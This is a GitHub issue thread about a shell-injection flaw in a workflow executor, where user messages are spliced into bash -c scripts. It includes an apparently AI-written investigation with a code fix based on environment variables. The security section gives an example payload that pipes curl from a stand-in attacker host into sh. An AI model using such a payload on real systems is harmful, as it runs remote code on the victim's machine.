Variable substitution in `bash:` nodes is shell-injection-unsafe (subsumes #1377)

[ztech-gthb]

Summary

• What broke: Every variable substitution in a bash: node — $ARGUMENTS, $USER_MESSAGE, $nodeId.output, etc. — is spliced into the bash body literally before bash -c <body> runs. Any shell-meaningful character in the value (backtick, $, \, ", newline) becomes part of the shell program rather than a value passed to it. Workflows using these substitutions in bash: nodes crash on benign content (markdown code-blocks, single-quoted numbers from upstream nodes) and, worse, are wide open to shell-injection from any adapter delivering partly-untrusted text.
• When it started: as far back as git blame on executor-shared.ts shows; not a regression, an original-design footgun.
• Severity: major — security-relevant for any adapter where the user message isn't human-curated (GitHub comments, email, webhooks). Hard blocker for any custom bash:-node workflow.
• Related: archon-fix-github-issue fails in fetch-issue when issue number output is shell-quoted #1377 reports the same root cause from a different angle — $nodeId.output carrying single-quoted AI output crashes the same bash -c parse. This issue subsumes it and proposes a fix that resolves both vectors.

Steps to Reproduce

1. Create a workflow with a bash: node that references $ARGUMENTS:

   name: repro
   nodes:
     - id: parse
       bash: bash -c 'echo "$ARGUMENTS"'

2. Trigger it with a user message containing a markdown code-block or any unbalanced backtick, e.g.:

   Edit `foo.py`: replace `bar` with:
   
   ```python
   def baz(): pass
   ```
   

3. Observe the run fail at the parse node before echo is reached.

Expected vs Actual

• Expected: $ARGUMENTS is delivered to the bash node as a value, available via "$ARGUMENTS" (or $1 etc.), regardless of the characters in the user message.
• Actual: The user message is spliced into the bash source and re-parsed by the shell. Backticks, $(), \, etc. inside the message are interpreted as shell syntax. Benign markdown breaks the parse; malicious payloads execute.

User Flow

User / Adapter           Orchestrator              Workflow Executor          bash -c
──────────────           ────────────              ─────────────────          ───────
sends message ─────────▶ stores as user_message
(may originate           dispatches workflow ────▶ substitutes $ARGUMENTS
from email,                                        LITERALLY into bash:
GitHub issue body,                                 body string
webhook, etc.)                                                       ───────▶ [X] re-parses
                                                                              user content
                                                                              as shell code
                                                                              → backtick EOF
                                                                              or arbitrary
                                                                              command exec

Environment

• Platform: any (reproduces on Web/CLI; same code path for all adapters)
• Database: any (SQLite verified; PostgreSQL identical — substitution is dialect-independent)
• Running in worktree? No (orthogonal — bug is in the executor, not isolation)
• OS: any (verified macOS host, linux container)

Logs

Failure of the form (taken from a real custom-workflow run):

{
  "error": "DAG workflow 'ztech-marimo-edit' completed with failures: 'parse-args':
            Bash node 'parse-args' failed [exit 2]:
            bash: -c: line 59: unexpected EOF while looking for matching `"
}

The user message that triggered this is ~3.5 KB, two ```python fenced blocks, ~10 inline backticks — orchestrator-synthesized from a short prose user prompt. Crash is deterministic for the same input.

Security considerations

This is not only a robustness bug. Any adapter where the user message originates from an untrusted or partially-trusted source (e.g. GitHub issue/comment bodies, Slack DMs, email subjects/bodies, webhook payloads) becomes a command-injection vector for any workflow whose bash: nodes use $ARGUMENTS. A crafted payload of the form:

hello `curl https://attacker.example/x | sh` world

is spliced verbatim into the shell program. The currently-reported failure mode (unexpected EOF) is the benign outcome — bash parses, crashes, executes nothing. A balanced payload parses cleanly and runs. This applies equally to inline bash: bodies and to file-script invocations like bash script.sh "$ARGUMENTS" (the splicing happens in the outer bash -c line, before the script file is read).

Built-in workflows in .archon/workflows/defaults/ happen not to use $ARGUMENTS in bash: nodes (the variable is only threaded into AI nodes there, where it is delivered as a JSON string field — no shell on the path). So no shipped Archon workflow is exploitable today. But any user-authored or AI-generated custom workflow using the natural-looking pattern is. There is no warning in the docs.

Impact

• Affected workflows/commands: any bash: node that references $ARGUMENTS or $USER_MESSAGE. Zero in defaults/ ship with this pattern; arbitrary in user/custom workflows.
• Reproduction rate: Always (deterministic for any user_message containing an unbalanced backtick / $() / etc.).
• Workaround available? Avoid $ARGUMENTS in bash: nodes; route the variable through a prompt: node instead. Or sanitize the user message upstream. Neither is documented; both are awkward.
• Data loss risk? No (workflow fails before any node runs). Possible side-effects under attack (arbitrary commands), but no data-corruption from the bug itself.

Scope

• Package(s) likely involved: workflows
• Module: workflows:executor-shared (packages/workflows/src/executor-shared.ts:387-396, the substituteWorkflowVariables function), and the bash-node spawn site that consumes its output.

Proposed fixes

Two viable directions; either resolves the bug for all existing and future workflows transparently:

(a) Env-var pass-through (recommended). Stop substituting these variables into the bash source. Instead, set ARGUMENTS, USER_MESSAGE, and the per-node outputs as environment variables on the spawned bash process; let bash do its normal "$ARGUMENTS" / "$NODE_PARSE_OUTPUT" expansion at runtime. YAMLs continue to read bash: bash script.sh "$ARGUMENTS" and Just Work; scripts still receive $1 exactly as before. Implementation: in the bash-node spawn path, skip those keys in the substitution loop and merge them into the child's env. Naming convention for node-outputs ($NODE_<id>_OUTPUT or similar) needs a small bikeshed; the underlying mechanism is identical for both classes of variable.

(b) Shell-quote-on-substitute. Keep literal substitution but wrap the values in '…' with proper single-quote escaping before splicing. Less surprising for users who currently embed ${VAR}-suffix patterns in their YAMLs, but more brittle — every variable substituted into a bash: body now needs the quoting, and single-quote escaping has its own footguns.

I'd recommend (a): smaller blast radius, no behavioral change for compliant YAMLs, and the env-var hand-off matches how Archon already passes other context ($ARTIFACTS_DIR etc. are plain string values that authors expect to read with "$VAR" in bash). It also resolves #1377 with no separate fix — once values are passed by env rather than spliced, the '4' from that report no longer breaks the parse.

Either fix should also pick up a short paragraph in workflow-yaml-reference.md explaining the contract: variables are exposed as environment variables to bash: nodes; do not concatenate them into bash -c '…' literals. The current reference (workflow-yaml-reference.md:222-223) says only "Full user message string" — no mention of substitution semantics or shell-injection risk.

Out of scope

• Whether the orchestrator-AI should be discouraged from synthesizing huge prompts when invoking workflows. The fix needs to be at the executor regardless — even short user messages can contain backticks.
• Whether prompt: / command: nodes have the same class of bug. They don't reach a shell, so the same substitution is safe there. Worth a quick audit, separate change.

[acton-golden]

🔍 Investigation: Variable substitution in bash: nodes is shell-injection-unsafe

Type: BUG

Assessment

Metric	Value	Reasoning
Severity	HIGH	Any workflow using $ARGUMENTS or $USER_MESSAGE in a bash: node is exploitable when user messages originate from partially-trusted sources; no built-in workflows are affected today but all user-authored bash-node workflows using these variables are at risk
Complexity	LOW	Two-file change: one function gains an options parameter, the bash-node spawn site skips unsafe substitutions and passes values as env vars instead
Confidence	HIGH	Root cause is unambiguous in source — substituteWorkflowVariables does literal .replace() on userMessage before the string is passed to bash -c

---

Problem Statement

executeBashNode calls substituteWorkflowVariables, which performs a literal string replacement of $ARGUMENTS/$USER_MESSAGE and context variables into the bash script body before passing it to bash -c. Any shell metacharacters in the user message (backticks, $(), unbalanced quotes, newlines) become part of the parsed shell program rather than data values. Benign markdown crashes the parse; crafted payloads execute.

---

Root Cause Analysis

WHY: bash exits with "unexpected EOF" or runs injected commands
↓ BECAUSE: bash -c <script> parses the full script body as shell source
  Evidence: dag-executor.ts:1329 — execFileAsync('bash', ['-c', finalScript], ...)

↓ BECAUSE: finalScript contains the literal user message text
  Evidence: dag-executor.ts:1308-1316 — substituteWorkflowVariables(node.bash, ..., workflowRun.user_message, ...)

↓ ROOT CAUSE: substituteWorkflowVariables does literal string replacement
  Evidence: executor-shared.ts:391-392
    .replace(/\$USER_MESSAGE/g, userMessage)
    .replace(/\$ARGUMENTS/g, userMessage)
  And executor-shared.ts:413
    result = result.replace(CONTEXT_VAR_PATTERN, issueContext ?? '')

Note: $nodeId.output references are already safe — substituteNodeOutputRefs with escapedForBash=true wraps them in shellQuote(). Only the workflow variables from Pass 1 are unprotected.

---

Implementation Plan

Fix: env-var pass-through (approach (a) from the issue)

Stop substituting user-controlled variables into the bash script source. Pass them as environment variables on the subprocess instead — bash naturally expands $ARGUMENTS from env at runtime. No behavioral change for correctly written scripts; user message never appears in the parsed shell source.

Step	File	Change
1	packages/workflows/src/executor-shared.ts:365	Add options?: { shellSafe?: boolean } to substituteWorkflowVariables; when shellSafe: true, skip $USER_MESSAGE, $ARGUMENTS, $LOOP_USER_INPUT, $REJECTION_REASON, $LOOP_PREV_OUTPUT, and context vars
2	packages/workflows/src/dag-executor.ts:1307	Pass { shellSafe: true } to substituteWorkflowVariables in executeBashNode; add ARGUMENTS, USER_MESSAGE, CONTEXT, EXTERNAL_CONTEXT, ISSUE_CONTEXT to subprocessEnv
3	packages/workflows/src/dag-executor.test.ts	Add test: metacharacter safety (script body must not contain user message); add test: env-var delivery (verify ARGUMENTS/USER_MESSAGE/CONTEXT in subprocess env)
4	packages/docs-web/src/content/docs/reference/variables.md:68	Expand "Shell Quoting" section to document env-var delivery model for user-input vars in bash nodes

📋 Detailed implementation steps

Step 1: executor-shared.ts — add shellSafe option

export function substituteWorkflowVariables(
  prompt: string,
  workflowId: string,
  userMessage: string,
  artifactsDir: string,
  baseBranch: string,
  docsDir: string,
  issueContext?: string,
  loopUserInput?: string,
  rejectionReason?: string,
  loopPrevOutput?: string,
  options?: { shellSafe?: boolean }       // NEW
): { prompt: string; contextSubstituted: boolean } {
  // ... existing BASE_BRANCH fail-fast check ...

  const resolvedDocsDir = docsDir || 'docs/';
  const shellSafe = options?.shellSafe ?? false;   // NEW

  // Safe variables — always substituted (system-controlled, no user text)
  let result = prompt
    .replace(/\$WORKFLOW_ID/g, workflowId)
    .replace(/\$ARTIFACTS_DIR/g, artifactsDir)
    .replace(/\$BASE_BRANCH/g, baseBranch)
    .replace(/\$DOCS_DIR/g, resolvedDocsDir);

  if (!shellSafe) {
    // User-controlled: skip in bash nodes, passed as env vars instead
    result = result
      .replace(/\$USER_MESSAGE/g, userMessage)
      .replace(/\$ARGUMENTS/g, userMessage)
      .replace(/\$LOOP_USER_INPUT/g, loopUserInput ?? '')
      .replace(/\$REJECTION_REASON/g, rejectionReason ?? '')
      .replace(/\$LOOP_PREV_OUTPUT/g, loopPrevOutput ?? '');
  }

  if (!shellSafe) {
    const hasContextVariables = new RegExp(CONTEXT_VAR_PATTERN_STR).test(result);
    // ... existing debug log ...
    result = result.replace(new RegExp(CONTEXT_VAR_PATTERN_STR, 'g'), issueContext ?? '');
    return { prompt: result, contextSubstituted: hasContextVariables && !!issueContext };
  }

  return { prompt: result, contextSubstituted: false };
}

Step 2: dag-executor.ts — executeBashNode changes

const { prompt: substitutedScript } = substituteWorkflowVariables(
  node.bash,
  workflowRun.id,
  workflowRun.user_message,
  artifactsDir,
  baseBranch,
  docsDir,
  issueContext,
  undefined,
  undefined,
  undefined,
  { shellSafe: true }    // NEW — leaves user-input tokens for bash env expansion
);

const subprocessEnv: NodeJS.ProcessEnv = {
  ...process.env,
  ARTIFACTS_DIR: artifactsDir,
  LOG_DIR: logDir,
  BASE_BRANCH: baseBranch,
  ARGUMENTS: workflowRun.user_message,    // NEW
  USER_MESSAGE: workflowRun.user_message, // NEW
  CONTEXT: issueContext ?? '',             // NEW
  EXTERNAL_CONTEXT: issueContext ?? '',   // NEW
  ISSUE_CONTEXT: issueContext ?? '',      // NEW
  ...(envVars ?? {}),
};

---

Validation

bun run type-check && bun test packages/workflows/src/dag-executor.test.ts && bun test packages/workflows/src/executor-shared.test.ts && bun run lint

---

Next Step

To implement: /implement-issue 1585

---

Investigated by Claude • 2026-05-10